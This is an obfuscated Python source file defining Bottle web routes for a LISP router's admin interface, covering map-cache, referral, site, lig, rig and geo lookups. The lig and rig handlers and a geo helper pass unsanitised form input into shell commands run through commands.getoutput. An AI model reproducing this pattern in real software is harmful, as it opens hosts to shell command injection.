@ bottle . route ( '/lisp/show/rtr/map-cache/<dns>' )
def i1I1II ( dns = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 17 - 17: O0 * OoOoOO00 * I1ii11iIi11i * II111iiii * I11i % i1IIi
if 33 - 33: I1ii11iIi11i * I1ii11iIi11i . ooOoO0o . i11iIiiIii
if ( dns == "dns" ) :
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show rtr-map-cache-dns" ) )
else :
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show rtr-map-cache" ) )
if 48 - 48: o0oOOo0O0Ooo . Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
if 94 - 94: i1IIi * i1IIi % II111iiii + OOooOOo
if 28 - 28: I1IiiI
@ bottle . route ( '/lisp/show/rtr/rloc-probing' )
def I11 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 54 - 54: Ii1I - I1Ii111
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show rtr-rloc-probing" ) )
if 81 - 81: IiII . O0 + II111iiii * iIii1I11I1II1 * OOooOOo / OoOoOO00
if 88 - 88: II111iiii - o0oOOo0O0Ooo * I1IiiI . OoO0O00
if 65 - 65: IiII . i1IIi
if 95 - 95: I1IiiI + I1IiiI - OOooOOo - iII111i
if 45 - 45: Ii1I . OoooooooOO
if 27 - 27: Ii1I * Oo0Ooo . OoOoOO00
if 17 - 17: II111iiii % iII111i * OOooOOo % i1IIi . I1IiiI . iIii1I11I1II1
@ bottle . post ( '/lisp/show/rtr/map-cache/lookup' )
def iiiIIIii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 93 - 93: iIii1I11I1II1 + I1IiiI + i11iIiiIii
if 74 - 74: I11i / II111iiii + ooOoO0o * iIii1I11I1II1 - I1Ii111 - OoO0O00
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 69 - 69: iIii1I11I1II1 * I1IiiI - iII111i + O0 + O0
if 65 - 65: I1Ii111 / i11iIiiIii / OoO0O00 - OOooOOo
Oo0O0 = "show rtr-map-cache" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo ,
Oo0O0 ) )
if 9 - 9: I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
@ bottle . route ( '/lisp/show/referral' )
def iiii1i1II1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 63 - 63: iIii1I11I1II1 % I1ii11iIi11i - iII111i
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show referral-cache" ) )
if 17 - 17: I1IiiI
if 88 - 88: OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
@ bottle . post ( '/lisp/show/referral/lookup' )
def I1III1iIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 82 - 82: I1IiiI + iII111i + I1ii11iIi11i * I1IiiI % i11iIiiIii % iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
Oo0O0 = "show referral-cache" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
if 12 - 12: Ii1I
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
@ bottle . route ( '/lisp/show/delegations' )
def IiIIiiI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 60 - 60: I1Ii111
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show delegations" ) )
if 98 - 98: ooOoO0o
if 34 - 34: iIii1I11I1II1 * I11i * I11i / I1ii11iIi11i
if 28 - 28: OoO0O00 - oO0o + OoOoOO00 + Ii1I / iIii1I11I1II1
if 26 - 26: iIii1I11I1II1 - O0 . O0
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
if 50 - 50: IiII + o0oOOo0O0Ooo
if 96 - 96: OoO0O00
@ bottle . post ( '/lisp/show/delegations/lookup' )
def oOOoO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
Oo0O0 = "show delegations" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
@ bottle . route ( '/lisp/show/site' )
@ bottle . route ( '/lisp/show/site/<eid_prefix>' )
def oO0OIiii1I ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
Oo0O0 = "show site"
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
if 53 - 53: I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
if 38 - 38: OoO0O00 / ooOoO0o % I1Ii111 * I11i + i11iIiiIii % ooOoO0o
if 61 - 61: I1Ii111 - Ii1I % I1ii11iIi11i / ooOoO0o / iII111i + iIii1I11I1II1
if 87 - 87: I1Ii111 + ooOoO0o + O0 / i1IIi % IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
@ bottle . route ( '/lisp/show/itr/dynamic-eid/<eid_prefix>' )
def O0000oO0o00 ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
Oo0O0 = "show itr-dynamic-eid"
if 43 - 43: Oo0Ooo . I1Ii111
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
@ bottle . route ( '/lisp/show/etr/dynamic-eid/<eid_prefix>' )
def i111i1I1ii1i ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
Oo0O0 = "show etr-dynamic-eid"
if 49 - 49: IiII * O0 . IiII
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
if 19 - 19: II111iiii - IiII
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
@ bottle . post ( '/lisp/show/site/lookup' )
def IiII1i1iI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
Oo0O0 = "show site" + "%" + iI1IiiiIiI1Ii + "@lookup"
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
@ bottle . post ( '/lisp/lig' )
def iii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
O0OoO0o = bottle . request . forms . get ( "eid" )
I111IIiIII = bottle . request . forms . get ( "mr" )
OO0OOoo0OOO = bottle . request . forms . get ( "count" )
ooooOoo0OO = "no-info" if bottle . request . forms . get ( "no-nat" ) == "yes" else ""
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if ( I111IIiIII == "" ) : I111IIiIII = "localhost"
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if ( O0OoO0o == "" ) :
o00 = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
iIIi1Ii1III = ""
if os . path . exists ( "lisp-lig.pyo" ) : iIIi1Ii1III = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : iIIi1Ii1III = "lisp-lig.py"
if 86 - 86: i11iIiiIii + i11iIiiIii . I1Ii111 % I1IiiI . ooOoO0o
if 17 - 17: Ii1I
if 67 - 67: O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if ( iIIi1Ii1III == "" ) :
o00 = "Cannot find lisp-lig.py or lisp-lig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if ( OO0OOoo0OOO != "" ) : OO0OOoo0OOO = "count {}" . format ( OO0OOoo0OOO )
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
Oo0O0 = 'python {} "{}" to {} {} {}' . format ( iIIi1Ii1III , O0OoO0o , I111IIiIII , OO0OOoo0OOO , ooooOoo0OO )
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
o00 = commands . getoutput ( Oo0O0 )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = lisp . convert_font ( o00 )
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
i111IiiI1Ii = lisp . space ( 2 ) + "RLOC:"
o00 = o00 . replace ( "RLOC:" , i111IiiI1Ii )
OooOOOOOo = lisp . space ( 2 ) + "Empty,"
o00 = o00 . replace ( "Empty," , OooOOOOOo )
o0oooOO00 = lisp . space ( 4 ) + "geo:"
o00 = o00 . replace ( "geo:" , o0oooOO00 )
i1I11ii = lisp . space ( 4 ) + "elp:"
o00 = o00 . replace ( "elp:" , i1I11ii )
o0ooO00O0O = lisp . space ( 4 ) + "rle:"
o00 = o00 . replace ( "rle:" , o0ooO00O0O )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
@ bottle . post ( '/lisp/rig' )
def i111I11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
O0OoO0o = bottle . request . forms . get ( "eid" )
iiII1iiiiiii = bottle . request . forms . get ( "ddt" )
iiIiii = "follow-all-referrals" if bottle . request . forms . get ( "follow" ) == "yes" else ""
if 39 - 39: I1IiiI + Oo0Ooo
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if ( iiII1iiiiiii == "" ) : iiII1iiiiiii = "localhost"
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if ( O0OoO0o == "" ) :
o00 = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
Ooo000O00 = ""
if os . path . exists ( "lisp-rig.pyo" ) : Ooo000O00 = "-O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.py" ) : Ooo000O00 = "lisp-rig.py"
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if ( Ooo000O00 == "" ) :
o00 = "Cannot find lisp-rig.py or lisp-rig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
Oo0O0 = 'python {} "{}" to {} {}' . format ( Ooo000O00 , O0OoO0o , iiII1iiiiiii , iiIiii )
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
o00 = commands . getoutput ( Oo0O0 )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = lisp . convert_font ( o00 )
if 45 - 45: OoooooooOO
I1 = lisp . space ( 2 ) + "Referrals:"
o00 = o00 . replace ( "Referrals:" , I1 )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 98 - 98: i1IIi . I1IiiI . oO0o
if 10 - 10: I1ii11iIi11i % I1IiiI - II111iiii
if 11 - 11: O0 + I1IiiI
if 80 - 80: oO0o % oO0o % O0 - i11iIiiIii . iII111i / O0
if 13 - 13: I1IiiI + O0 - I1ii11iIi11i % Oo0Ooo / Ii1I . i1IIi
if 60 - 60: Oo0Ooo . IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
def Ii1iiI1 ( eid1 , eid2 ) :
iIIi1Ii1III = None
if os . path . exists ( "lisp-lig.pyo" ) : iIIi1Ii1III = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : iIIi1Ii1III = "lisp-lig.py"
if ( iIIi1Ii1III == None ) : return ( [ None , None ] )
if 76 - 76: Ii1I * iIii1I11I1II1
if 31 - 31: i11iIiiIii + OOooOOo - O0
if 51 - 51: OoO0O00 * i1IIi / Ii1I * OOooOOo + ooOoO0o % I1ii11iIi11i
if 34 - 34: oO0o * OoooooooOO + Ii1I + i11iIiiIii
iiIi = commands . getoutput ( "egrep -A 2 'lisp map-resolver {' ./lisp.config" )
I111IIiIII = None
for I11Ii in [ "address = " , "dns-name = " ] :
I111IIiIII = None
O0oo0 = iiIi . find ( I11Ii )
if ( O0oo0 == - 1 ) : continue
I111IIiIII = iiIi [ O0oo0 + len ( I11Ii ) : : ]
O0oo0 = I111IIiIII . find ( "\n" )
if ( O0oo0 == - 1 ) : continue
I111IIiIII = I111IIiIII [ 0 : O0oo0 ]
break
if 37 - 37: i11iIiiIii
if ( I111IIiIII == None ) : return ( [ None , None ] )
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
OOOO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
oOIii11111iiI = [ ]
for O0OoO0o in [ eid1 , eid2 ] :
if 67 - 67: o0oOOo0O0Ooo
if 76 - 76: OoOoOO00 - I1IiiI + OOooOOo + I11i
if 50 - 50: I1Ii111 + I1ii11iIi11i
if 4 - 4: IiII / Oo0Ooo
if 31 - 31: I1Ii111 - I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - oO0o
if ( OOOO . is_geo_string ( O0OoO0o ) ) :
oOIii11111iiI . append ( O0OoO0o )
continue
if 43 - 43: iII111i + Oo0Ooo / OoooooooOO
if 24 - 24: O0 + o0oOOo0O0Ooo * Ii1I - I1Ii111
Oo0O0 = 'python {} "{}" to {} count 1' . format ( iIIi1Ii1III , O0OoO0o , I111IIiIII )
for I1i in [ Oo0O0 , Oo0O0 + " no-info" ] :
o00 = commands . getoutput ( Oo0O0 )
O0oo0 = o00 . find ( "geo: " )
if ( O0oo0 == - 1 ) :
if ( I1i != Oo0O0 ) : oOIii11111iiI . append ( None )
continue
if 10 - 10: i11iIiiIii
o00 = o00 [ O0oo0 + len ( "geo: " ) : : ]
O0oo0 = o00 . find ( "\n" )
if ( O0oo0 == - 1 ) :
if ( I1i != Oo0O0 ) : oOIii11111iiI . append ( None )
continue
if 21 - 21: I1IiiI / iII111i
oOIii11111iiI . append ( o00 [ 0 : O0oo0 ] )
break
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
return ( oOIii11111iiI )
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
@ bottle . post ( '/lisp/geo' )
def iI1iiIi1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 49 - 49: ooOoO0o . II111iiii
if 24 - 24: O0 . OoooooooOO - OoO0O00 * OoooooooOO
O0OoO0o = bottle . request . forms . get ( "geo-point" )
Ii11iiI = bottle . request . forms . get ( "geo-prefix" )
o00 = ""
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
I1iI1I1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iIIi1 = lisp . lisp_geo ( "" )
o0Ooo0o0Oo = lisp . lisp_geo ( "" )
oo00ooooOOo00 , ii1i = Ii1iiI1 ( O0OoO0o , Ii11iiI )
if 70 - 70: oO0o % IiII % I1IiiI + i11iIiiIii . Ii1I % I1Ii111
if 38 - 38: OoO0O00 . ooOoO0o
if 34 - 34: i1IIi % IiII
if 80 - 80: OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if ( I1iI1I1ii1 . is_geo_string ( O0OoO0o ) ) :
if ( iIIi1 . parse_geo_string ( O0OoO0o ) == False ) :
o00 = "Could not parse geo-point format"
if 36 - 36: I1IiiI + Oo0Ooo
elif ( oo00ooooOOo00 == None ) :
o00 = "EID {} lookup could not find geo-point" . format (
lisp . bold ( O0OoO0o , True ) )
elif ( iIIi1 . parse_geo_string ( oo00ooooOOo00 ) == False ) :
o00 = "Could not parse geo-point format returned from lookup"
if 46 - 46: iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if ( o00 == "" ) :
if ( I1iI1I1ii1 . is_geo_string ( Ii11iiI ) ) :
if ( o0Ooo0o0Oo . parse_geo_string ( Ii11iiI ) == False ) :
o00 = "Could not parse geo-prefix format"
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
elif ( ii1i == None ) :
o00 = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( Ii11iiI , True ) )
if 34 - 34: I1Ii111 - OOooOOo
elif ( o0Ooo0o0Oo . parse_geo_string ( ii1i ) == False ) :
o00 = "Could not parse geo-prefix format returned from lookup"
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if ( o00 == "" ) :
O0OoO0o = "" if ( O0OoO0o == oo00ooooOOo00 ) else ", EID {}" . format ( O0OoO0o )
Ii11iiI = "" if ( Ii11iiI == ii1i ) else ", EID-prefix {}" . format ( Ii11iiI )
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
II111IIIII = iIIi1 . print_geo_url ( )
IIiIi1 = o0Ooo0o0Oo . print_geo_url ( )
O00O00o = o0Ooo0o0Oo . radius
I11IiI1iI = iIIi1 . dms_to_decimal ( )
I11IiI1iI = ( round ( I11IiI1iI [ 0 ] , 6 ) , round ( I11IiI1iI [ 1 ] , 6 ) )
O0OO0OoO = o0Ooo0o0Oo . dms_to_decimal ( )
O0OO0OoO = ( round ( O0OO0OoO [ 0 ] , 6 ) , round ( O0OO0OoO [ 1 ] , 6 ) )
o0OOo = round ( o0Ooo0o0Oo . get_distance ( iIIi1 ) , 2 )
IiI1Ii11Ii = "inside" if o0Ooo0o0Oo . point_in_circle ( iIIi1 ) else "outside"
if 99 - 99: O0 . o0oOOo0O0Ooo % I11i - Oo0Ooo / I11i
if 20 - 20: OoOoOO00 * iII111i
i1i1 = lisp . space ( 2 )
I1iiIiIII = lisp . space ( 1 )
o0IiIiI111IIII1 = lisp . space ( 3 )
if 100 - 100: OOooOOo * O0 + I1IiiI + OoOoOO00 . OOooOOo
o00 = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( i1i1 , II111IIIII , I11IiI1iI , O0OoO0o ,
# iIii1I11I1II1 * IiII - OOooOOo / Oo0Ooo % oO0o
I1iiIiIII , IIiIi1 , O0OO0OoO , O00O00o , Ii11iiI )
o00 += "Distance:{}{} kilometers, point is {} of circle" . format ( o0IiIiI111IIII1 ,
o0OOo , lisp . bold ( IiI1Ii11Ii , True ) )
if 66 - 66: OoooooooOO + ooOoO0o * iII111i
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 2 - 2: iII111i . OoO0O00 / oO0o
if 41 - 41: OoO0O00 . I1Ii111 * IiII * I1Ii111
if 74 - 74: iIii1I11I1II1 / o0oOOo0O0Ooo
if 58 - 58: iIii1I11I1II1 - I1IiiI % o0oOOo0O0Ooo % OoooooooOO * iIii1I11I1II1 + OOooOOo
if 25 - 25: OOooOOo % O0
if 44 - 44: I1Ii111 . Ii1I * II111iiii / IiII + iIii1I11I1II1
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
